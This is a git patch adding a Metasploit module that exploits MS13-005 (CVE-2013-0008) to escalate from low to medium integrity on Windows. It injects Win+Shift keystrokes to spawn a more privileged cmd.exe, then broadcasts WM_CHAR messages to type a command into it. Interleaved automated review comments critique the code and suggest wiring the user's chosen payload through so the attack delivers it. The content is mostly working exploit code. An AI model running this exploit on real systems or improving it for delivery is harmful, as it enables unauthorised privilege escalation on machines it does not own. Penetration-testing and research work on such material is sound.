From 0235e6803d57f17e517f32952a582ae02f0421c3 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Thu, 25 Jul 2013 23:24:11 +0100 Subject: [PATCH] Initial working --- .../stdapi/railgun/def/def_kernel32.rb | 2 + modules/exploits/windows/local/ms13_005.rb | 105 ++++++++++++++++++ 2 files changed, 107 insertions(+) create mode 100644 modules/exploits/windows/local/ms13_005.rb diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb index 553b995960..fac210dda8 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb @@ -11,6 +11,8 @@ class Def_kernel32 def self.create_dll(dll_path = 'kernel32') dll = DLL.new(dll_path, ApiConstants.manager) + + dll.add_function( 'GetConsoleWindow', 'LPVOID',[]) dll.add_function( 'ActivateActCtx', 'BOOL',[ ["HANDLE","hActCtx","inout"], diff --git a/modules/exploits/windows/local/ms13_005.rb b/modules/exploits/windows/local/ms13_005.rb new file mode 100644 index 0000000000..63f75d6ac7 --- /dev/null +++ b/modules/exploits/windows/local/ms13_005.rb 
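Review bot: The new `GetConsoleWindow` entry is declared with an `LPVOID` return, which Railgun presumably hands back as an integer address, so a NULL window handle would arrive as 0 rather than nil; the caller this commit adds in modules/exploits/windows/local/ms13_005.rb tests `if hwin == nil` and would therefore never fall through to `GetForegroundWindow` — confirm how an LPVOID return is unpacked and compare against 0 there if so. A short comment on the new line, `# returns the calling process's console window handle, or NULL when it has no console`, would document the contract that caller relies on. The definition is also placed ahead of `ActivateActCtx`, while the surrounding entries appear to be kept in alphabetical order; moving it next to the other functions beginning with G keeps the table easy to scan. `create_dll` continues beyond the end of the hunk.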
@@ -0,0 +1,105 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::EXE
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'MS13-005 Low Integrity to Medium Integrity Privilege Escalation',
+ 'Description' => %q{
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Ben Campbell ',
+ 'Tavis Ormandy', #Discovery
+ 'Axel Souchet' #@0vercl0k POC
+ ],
+ 'Platform' => [ 'win' ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Targets' =>
+ [
+ [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+ [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate'=> "Nov 27 2912"
+ # References CVE-2013-0008
+ ))
+ end
+
+ def win_shift(number)
+ vk = 0x30 + number
+ bscan = 0x81 + number
+ client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
+ client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
+ client.railgun.user32.keybd_event(vk, bscan, 0, 0)
+
+ client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
+ client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
+ client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
+ end
+
+ def count_cmd_procs
+ count = 0
+ client.sys.process.each_process do |proc|
+ if proc['name'] == 'cmd.exe'
+ count += 1
+ end
+ end
+ puts count
+
+ return count
+ end
+
+ # Run Method for when run command is issued
+ def exploit
+ @payload_name = datastore['PAYLOAD']
+ @payload_arch = framework.payloads.create(@payload_name).arch
+
+ # syinfo is only on meterpreter sessions
+ print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+ hwin = client.railgun.kernel32.GetConsoleWindow()['return']
+ if hwin == nil
+ hwin = client.railgun.user32.GetForegroundWindow()['return']
+ end
+ puts client.railgun.user32.ShowWindow(hwin, 0)
+ puts client.railgun.user32.ShowWindowAsync(hwin, 5)
+ # Spawn low integrity cmd.exe
+ li_cmd_pid = client.sys.process.execute("cmd.exe", nil, {'Hidden' => false }).pid
+
+ count = count_cmd_procs
+ # Win+Shift+?
+ number = 0
+ begin # Ruby DoWhile!
+ i = (9 - number)
+ win_shift(number)
+ number += 1
+ sleep(1)
+ end while count_cmd_procs == count and number <= 9
+ print_status "Spawned!!!"
+
+ client.sys.process.kill(li_cmd_pid)
+ payload = "calc.exe"
+ hwnd_broadcast = 0xffff
+ wm_char = 0x0102
+ payload.each_char do |c|
+ client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, c.unpack('c').first, 0)
+ end
+
+ client.railgun.user32.SendMessageA(hwnd_broadcast, wm_char, 'VK_RETURN', 0)
+
+ end
+end
+
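Review bot: `print_status "Spawned!!!"` in `exploit` is reached even when the `begin … end while` loop gives up after `number` passes 9 with `count_cmd_procs` unchanged, and the run then continues into the `SendMessageA` loop with nothing to act on; re-check the count once after the loop and call `fail_with` when no new cmd.exe appeared. The selected payload is never delivered: `payload = "calc.exe"` shadows the module's `payload` accessor, `@payload_arch` and the `Msf::Exploit::EXE` include are unused, and `i = (9 - number)` is dead — either wire `datastore['PAYLOAD']` through or state in the description that this is a proof of concept. The `puts count` and `puts client.railgun.user32.ShowWindow(...)` calls write to the framework process's stdout rather than the module's output channel; use `vprint_status` or drop them. The module metadata is incomplete: `'Description'` is empty, the CVE sits in a comment instead of `'References' => [ [ 'CVE', '2013-0008' ] ]`, and `"Nov 27 2912"` is a year typo (presumably 2012). Minor idiom: `if not sysinfo.nil?` reads better as `if sysinfo`, and `and` in the loop condition should be `&&` to avoid precedence surprises.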